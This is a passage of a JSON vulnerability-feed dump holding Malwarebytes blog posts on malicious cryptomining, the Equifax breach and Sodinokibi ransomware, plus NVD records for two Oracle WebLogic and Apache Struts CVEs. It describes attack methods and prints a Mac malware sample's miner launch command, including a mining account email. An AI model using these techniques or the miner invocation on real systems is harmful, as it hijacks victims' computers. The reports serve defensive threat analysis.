EK](<https://blog.malwarebytes.com/threat-analysis/2018/01/rig-exploit-kit-campaign-gets-deep-into-crypto-craze/>) in particular have been distributing miners, usually via the intermediary of the SmokeLoader malware. In fact, cryptominers are one of the most commonly served payloads in drive-by download attacks.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/RIG_miner-1.png> \"\" )\n\n_Figure 3: An iframe redirection to RIG EK followed by a noticeable coin miner infection_\n\n### Mobile and Mac cryptominers\n\nMobile users are not immune to cryptomining either, as [Trojanized apps laced with mining code](<https://blog.malwarebytes.com/cybercrime/2018/02/bogus-hack-apps-hack-users-back-for-cryptocash/>) are also commonplace, especially for the Android platform. Similarly to Windows malware, malicious APKs tend to have modules for specific functionalities, such as SMS spam and of course miners.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android-1.jpg> \"\" )\n\n_Figure 4: Source code for the mining component within an Android APK_\n\nLegitimate mining pools such as [Minergate](<https://en.bitcoin.it/wiki/MinerGate>) are often used by those Android miners, and the same is true for [Mac cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-information-unfolds-regarding-mac-cryptominer/>). The usual advice on sticking to official websites to download applications applies but is not always enough, especially when [trusted applications get hacked](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Mac-1.png> \"\" )\n \n \n ~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr\n\n_Figure 5: Malicious Mac application launching a Monero miner_\n\n### Drive-by cryptomining\n\nIn mid-September 2017, a mysterious entity called Coinhive launched a new service that was about to create chaos on the web, as it introduced an API to mine the Monero currency directly within the browser.\n\nWhile in-browser miners have taken off because of Coinhive's popularity, they had already been tested a few years ago, mostly as proof-of-concepts that did not develop much further. There is, however, the legal precedent of a [group of students at MIT](<https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/>) who got sued by the state of New Jersey for their coin mining attempt\u2014called Tidbit\u2014proposed as an alternative to traditional display advertising.\n\n#### **No opt-in by default**\n\nWithin weeks, the Coinhive API, void of any safeguards, was abused in drive-by cryptomining attacks. Similar to drive-by downloads, [drive-by mining](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) is an automated, silent, and platform agnostic technique that forces visitors to a website to mine for cryptocurrency.\n\nWe witnessed an interesting [campaign](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) that was specifically designed for Android and drew millions of users to pages that immediately started to mine for Monero under the pretense of recouping server costs. Even though mobile devices aren't as powerful as desktops, let alone servers, this event showed that no one is immune to drive-by mining.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android_Drive_by-mining-1-1.png> \"\" )\n\n_Figure 6: An in-browser miner for Chrome on Android _\n\n[Malvertising](<https://blog.malwarebytes.com/threat-analysis/2017/09/drive-by-mining-and-ads-the-wild-wild-west/>) was once again a major factor in spreading coin miners to a large audience, as we saw with the [YouTube case](<https://twitter.com/Mystic_Ervo/status/956237422391709696>) that involved malicious ads via DoubleClick. Another interesting vector, which security people have warned about for years, is the use of third-party scripts that have become ubiquitous. A company called Texthelp had one of their [plugins compromised](<https://www.troyhunt.com/the-javascript-supply-chain-paradox-sri-csp-and-trust-in-third-party-libraries/>) and injected with a Coinhive script, leading to hundreds of government websites in the UK unwillingly participating in malicious cryptomining activity.\n\nTo fend off criticism, Coinhive introduced a new API (AuthedMine) that explicitly requires user input for any mining activity to be allowed. The idea was that considerate website owners would use this more \u201cethical\u201d API instead, so that their visitors can knowingly opt-in or out before engaging in cryptomining. This was also an argument that Coinhive put forward to defend its stance against ad blockers and antivirus products.\n\nWhile only Coinhive themselves would have accurate statistics, according to our own telemetry the opt-in version of their API was barely used (40K/day) in comparison to the silent one (3M/day), as pictured in the below histograms during the period of January 10 to February 6.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_opt-in-1.png> \"\" )\n\n_Figure 7: Usage statistics for the opt-in version of Coinhive_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_silent_drive-by-1.png> \"\" )\n\n_Figure 8: Usage statistics for the silent version of Coinhive_\n\nMoreover, even websites that do use the opt-in option may still be crippling machines by running an unthrottled miner, as was the case with popular[ American news website Salon](<https://twitter.com/jonathansampson/status/963465011153833984>)[[.]com](<https://twitter.com/jonathansampson/status/963465011153833984>).\n\n#### **Copycats**\n\nSeveral copycats emerged in the wake of Coinhive's immediate success. According to our stats, _coin-have[.]com_ is the second most popular service, followed by _crypto-loot[.]com_. While Coinhive takes a 30 percent commission on all mining earnings, Coin Have advertises the lowest commission rates in the market at 20 percent, although CryptoLoot itself claims to pay out 88 percent of mined commissions.\n\nIn additions to bigger payouts, other \u201cattractive\u201d features pushed by newcomers are low payment thresholds and the ability to bypass ad blockers, which they often view as their number one threat.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/copycats-1.png> \"\" )\n\n_Figure 9: Two of the most popular Coinhive copycats_\n\n#### **Browsers and technologies abused**\n\nContrary to malware-based coin miners, drive-by cryptomining does not require infecting a machine. This is both a strength and weakness in the sense that it can potentially reach a much wider audience but is also more ephemeral in nature.\n\nFor example, if a user navigates away from the website they are on or closes the offending tab, that will cause the mining activity to stop, which is a major drawback. However, we observed that some miners have developed sneaky ways of making drive-by mining [persistent](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>), thanks to the use of pop-unders, a practice well-known in the ad fraud business. To add insult to injury, the malicious pop-under tab containing the mining code would get placed right underneath the taskbar, rendering it virtually invisible to the end user. Thanks to this trick, the mining can carry on until the user actually restarts their computer.\n\nAnother way to mine for long and uninterrupted periods of time is by using a booby-trapped browser extension that will inject code in each web session. This is what happened to the Archive Poster extension because one of their developers had his Google account credentials compromised.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/extension-1.png> \"\" )\n\n_Figure 10: The compromised extension with a rogue JavaScript for Coinhive_\n\nIt is worth noting that JavaScript is not the only way to mine for coins within the browser. Indeed, we have observed WebAssembly, a newer format available in modern browsers, being used more and more. WebAssembly modules have the advantage of running at near native speed, making them a lot faster and more efficient than JavaScript.\n \n \n | payload =\n \u00a0 - [ ExportSection\n \u00a0\u00a0\u00a0 | count = 27\n \u00a0\u00a0\u00a0 | entries =\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 9\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"stackSave\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 71\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 17\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"_cryptonight_hash\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 70\n\n_Figure 11: Code snippet from a WebAssembly module designed for mining Monero_\n\nWhile drive-by mining typically happens via the standard HTTP protocol\u2014either via HTTP or HTTPS connections\u2014we have witnessed more and more examples of miners communicating via WebSockets instead.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/websocket_-1.png> \"\" )\n\n_Figure 12: A Web Socket connection to Coinhive_\n\nA WebSocket is another communication protocol that allows streams of data to be exchanged. There is an initial handshake request and response with a remote server followed by the actual data streams. Coin mining code wrapped within a secure (wss) WebSocket is more difficult to identify and block.\n\n### Conclusion\n\nAs the threat landscape continues to evolve, its connections to real-world trends become more and more obvious. Malware authors are not only enjoying the relative anonymity provided by digital currencies but also want to amass them.\n\nCryptomining malware provides a good use case for leveraging the size and power of a botnet in order to perform CPU-intensive mining tasks without having to bear the costs incurred in the process. In some aspect, drive-by mining also applies the same concept, except that the botnet of web users it creates is mostly temporary.\n\nWhile malicious cryptomining appears to be far less dangerous to the user than ransomware, its effects should not be undermined. Indeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down. Under the disguise of a financially-motivated attack, this could be the perfect alibi for advanced threat actors.\n\nMalwarebytes users, regardless of their platform, are protected against unwanted cryptomining, whether it is done via malware or the web.\n\nThe post [The state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-26T16:08:03", "type": "malwarebytes", "title": "The state of malicious cryptomining", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-02-26T16:08:03", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/", "id": "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-14T17:30:57", "description": "### [updates 9/14/2017]\n\nEquifax has released information and confirmed the vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) that was used in this breach after several days of intense scrutiny around Apache Struts. To make matters worse, there already was a patch available for this flaw in March 2017, two months prior to the incident.\n\n_**1) Updated information on U.S. website application vulnerability.**_ \n_Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement._\n\n### [updates 9/12/2017]\n\nEquifax's efforts in response to this incident can be followed at www.equifaxsecurity2017.com, but the[ site has been called](<https://krebsonsecurity.com/2017/09/equifax-breach-response-turns-dumpster-fire/>) \"completely broken at best, and little more than a stalling tactic or sham at worst.\" And [ isn\u2019t working for many people](<https://www.businessinsider.nl/equifax-data-breach-site-check-angry-response-2017-9/>). So, we leave it up to your best judgment whether you should pay that site a visit .\n\nOver 30 lawsuits have been filed against Equifax following the breach [according to Reuters](<http://www.reuters.com/article/us-equifax-cyber-lawsuits/lawsuits-against-equifax-pile-up-after-massive-data-breach-idUSKCN1BM2E3>).\n\n[Quartz reported](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) that the vulnerability they mentioned was in a popular open-source software package called Apache Struts, which is a programming framework for building web applications in Java. Two vulnerabilities in Struts have been discovered so far in 2017. The vulnerability announced on Sept. 4 has existed in Struts since 2008.\n\nApache responded to that report with [this Apache Struts Statement on Equifax Security Breach](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>).\n\n \n\nOn July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax's overall security posture.\n\n[According to Equifax](<https://www.equifaxsecurity2017.com/frequently-asked-questions/>), online criminals maintained their presence from mid-May through July 2017 and had access to:\n\n * Names\n * Social Security numbers\n * Birth dates\n * Addresses\n * Driver\u2019s license numbers (in some cases)\n * Credit card numbers (for approx. 209,000 U.S. consumers)\n\nIt also said that some personal information for certain UK and Canadian residents was part of this breach.\n\nThis is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.\n\nEquifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. More information about this breach and how to apply for ID theft protection can be found by going to [equifaxsecurity2017.com](<https://www.equifaxsecurity2017.com/>), a website Equifax has just set up.\n\nThe post [Equifax breach: What you need to know [updated]](<https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-08T07:02:47", "title": "Equifax breach: What you need to know [updated]", "type": "malwarebytes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-08T07:02:47", "id": "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "href": "https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-22T14:43:19", "description": "Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among [cybersecurity professionals](<https://www.tesorion.nl/aconnection-between-the-sodinokibi-and-gandcrab-ransomware-families/>) because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.\n\nDetected by Malwarebytes as [Ransom.Sodinokibi](<https://blog.malwarebytes.com/detections/ransom-sodinokibi/>), Sodinokibi is a [ransomware-as-a-service](<https://blog.malwarebytes.com/glossary/ransomware-as-a-service/>) (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We've watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevations in consumer detections in both mid June and mid July. Based on our telemetry, Sodinokibi has been on rise since GandCrab's exit at the end of May.\n\nBusiness and consumer detection trends for Sodin/REvil from May 2019 until present\n\nOn May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.\n\n\u201cWe are leaving for a well-deserved retirement,\u201d a GandCrab RaaS administrator announced. (Courtesy of security researcher [Damian](<https://twitter.com/Damian1338B/>) on Twitter) \n\nWhile many may have heaved sighs of relief at GandCrab's \"passing,\" some expressed [skepticism](<https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html>) over whether the team would truly put behind their successful money-making scheme. What followed was bleak anticipation of another ransomware operation\u2014or a re-emergence of the group peddling new wares\u2014taking over to fill the hole GandCrab left behind. \n\n### Enter Sodinokibi\n\nPutting a spin on an old product is a concept not unheard of in legitimate business circles. Often, spinning involves creating a new name for the product, some tweaking of its existing features, and finding new influencers\u2014\"affiliates\" in the case of RaaS operations\u2014to use (and market) the product. In addition, threat actors would initially limit the new product\u2019s availability and follow with a brand-new marketing campaign\u2014all without touching the product standard. In hindsight, it seems the GandCrab team has taken this route.\n\nA month before the GandCrab retirement announcement, Cisco Talos researchers [released](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>) information about their discovery of Sodinokibi. Attackers manually infected the target server after exploiting [a zero-day vulnerability](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>) in its Oracle WebLogic application.\n\nTo date, six versions of Sodinokibi has been seen in the wild.\n\nSodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered July 8 \n\n### Sodinokibi infection vectors \n\nLike GandCrab, the Sodinokibi ransomware follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors. Their attack methods include:\n\n * Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725\n * Malicious spam or phishing campaigns with links or attachments\n * [Malvertising](<https://blog.malwarebytes.com/glossary/malvertising/>) campaigns that lead to the RIG exploit kit, [an avenue that GandCrab used before](<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>)\n * Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, to push the ransomware en-masse. This is done by accessing networks via a remote desktop protocol (RDP) and then using the MSP console to deploy the ransomware.\n\nAlthough affiliates used these tactics to push GandCrab, too, many cybercriminals\u2014[nation-state actors included](<https://www.cvent.com/events/awareness-briefing-chinese-cyber-activity-targeting-managed-service-providers/archived-4b6946484ee141ac8ebe76047f198e1c.aspx>)\u2014have done the same to push their own malware campaigns.\n\n### Symptoms of Sodinokibi infection \n\n\n\nSystems infected with Sodinokibi ransomware show the following symptoms:\n\n**Changed desktop wallpaper.** Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:\n\n> All of your files are encrypted! \nFind {5-8 alpha-numeric characters}-readme.txt and follow instructions\n\n**Presence of ransomware note.** The _{5-8 alpha-numeric characters}-readme.txt_ file it's referring to is the ransom note that comes with every ransomware attack. In Sodinokibi\u2019s case, it looks like this:\n\n\n\nThe note contains instructions on how affected users can go about paying the ransom and how the decryption process works.\n\nScreenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments \n\n**Encrypted files with a 5\u20138 character extension name.** Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that's five to eight characters long.\n\nThe extension name and character string included in the ransom note file name are the same. For example, if Sodinokibi has encrypted an image file and renamed it to _paris2017.r4nd01_, its corresponding ransom note will have the file name _r4nd01-readme.txt_.\n\nSodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:\n\n * .jpg\n * .jpeg\n * .raw\n * .tif\n * .png\n * .bmp\n * .3dm\n * .max\n * .accdb\n * .db\n * .mdb\n * .dwg\n * .dxf\n * .cpp\n * .cs\n * .h\n * .php\n * .asp\n * .rb\n * .java\n * .aaf\n * .aep\n * .aepx\n * .plb\n * .prel\n * .aet\n * .ppj\n * .gif\n * .psd \n\n**Deleted shadow copy backups and disabled Windows Startup Repair tool.** Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is \u201ca snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,\u201d [according to Windows Dev Center](<https://docs.microsoft.com/en-us/windows/win32/vss/shadow-copies-and-shadow-copy-sets>). The latter is a recovery tool used to troubleshoot certain Windows problems.\n\nDeleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.\n\n### Other tricks up Sodinokibi\u2019s sleeve\n\nRansomware doesn\u2019t normally take advantage of zero-day vulnerabilities in their attacks\u2014but Sodinokibi is not your average ransomware. It takes advantage of an elevated privilege zero-day vulnerability in the Win32k component file in Windows. \n\nDesignated as [CVE-2018-8453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453>), this flaw can grant Sodinokibi administrator access to the endpoints it infects. This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.\n\nCVE-2018-8453 was the same vulnerability that [the ](<https://threatpost.com/fruityarmor-apt-exploits-yet-another-windows-graphics-kernel-flaw/138192/>)[FruitArmor](<https://threatpost.com/fruityarmor-apt-exploits-yet-another-windows-graphics-kernel-flaw/138192/>)[ APT](<https://threatpost.com/fruityarmor-apt-exploits-yet-another-windows-graphics-kernel-flaw/138192/>) exploited in its malware campaign last year.\n\nNew variants of Sodinokibi have also been found to use \u201cHeaven\u2019s Gate,\u201d an old evasion technique used to execute 64-bit code on a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected [an interesting cryptominer](<https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/>) we captured in the wild.\n\n### Protect your system from Sodinokibi\n\nMalwarebytes tracks Sodinokibi campaigns and protects [premium consumer users](<http://www.malwarebytes.com/premium>) and business users with [signature-less detection](<https://www.malwarebytes.com/business/endpointprotectionandresponse/>), nipping the attack in the bud before the infection chain even begins. Users of our free version are not protected from this threat without real-time protection.\n\n\n\nWe recommend consumers take the following actions if they are not premium Malwarebytes customers:\n\n * Create secure backups of your data, either on an external drive or [on the cloud](<https://blog.malwarebytes.com/101/2016/04/should-you-store-your-data-in-the-cloud/>). Be sure to detach your external drive from your computer once you've saved all your information, as it, too, could be infected if still connected.\n * Run updates on all your systems and software, patching for any vulnerabilities.\n * Be aware of suspicious emails, especially those that contain links or attachments. Read up on [how to detect phishing attempts](<https://blog.malwarebytes.com/101/2017/06/somethings-phishy-how-to-detect-phishing-attempts/>) both on your computer and your [mobile devices](<https://blog.malwarebytes.com/101/2018/12/something-else-phishy-detect-phishing-attempts-mobile/>).\n\nTo mitigate on the business side, we also recommend IT administrators to do the following:\n\n * Deny public IPs access to RDP port 3389.\n * Replace your company\u2019s ConnectWise ManagedITSync integration plug-in with [the latest version](<https://marketplace.connectwise.com/kaseya>) before reconnecting your VSA server to the Internet.\n * Block SMB port 445. In fact, it\u2019s sound security practice to block all unused ports.\n * Apply the latest Microsoft update packages.\n * In this vein, make sure all software on endpoints is up-to-date.\n * Limit the use of system administration tools to IT personnel or employees who need access only.\n * Disable macro on Microsoft Office products.\n * Regularly inform employees about threats that might be geared toward the organization\u2019s industry or the company itself with reminders on [how to handle suspicious emails](<https://blog.malwarebytes.com/101/2018/06/five-easy-ways-to-recognize-and-dispose-of-malicious-emails/>), such as avoiding clicking on links or opening attachments if they\u2019re not sure of the source.\n * Apply attachment filtering to email messages.\n * Regularly create multiple backups of data, preferably to devices that aren\u2019t connected to the Internet. \n\n### Indicators of compromise (IOCs)\n\nFile hashes:\n\n * e713658b666ff04c9863ebecb458f174\n * bf9359046c4f5c24de0a9de28bbabd14\n * 177a571d7c6a6e4592c60a78b574fe0e\n\nStay safe, everyone!\n\nThe post [Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void](<https://blog.malwarebytes.com/threat-spotlight/2019/07/threat-spotlight-sodinokibi-ransomware-attempts-to-fill-gandcrab-void/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-07-18T17:58:26", "type": "malwarebytes", "title": "Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8453", "CVE-2019-2725"], "modified": "2019-07-18T17:58:26", "id": "MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C", "href": "https://blog.malwarebytes.com/threat-spotlight/2019/07/threat-spotlight-sodinokibi-ransomware-attempts-to-fill-gandcrab-void/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-07T14:40:05", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T17:29:00", "type": "cve", "title": "CVE-2017-10271", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0"], "id": "CVE-2017-10271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10271", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T15:22:23", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T02:59:00", "type": "cve", "title": "CVE-2017-5638", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2021-02-24T12:15:00", "cpe": ["cpe:/a:apache:struts:2.3.24.2", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.5.4", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.24.3", 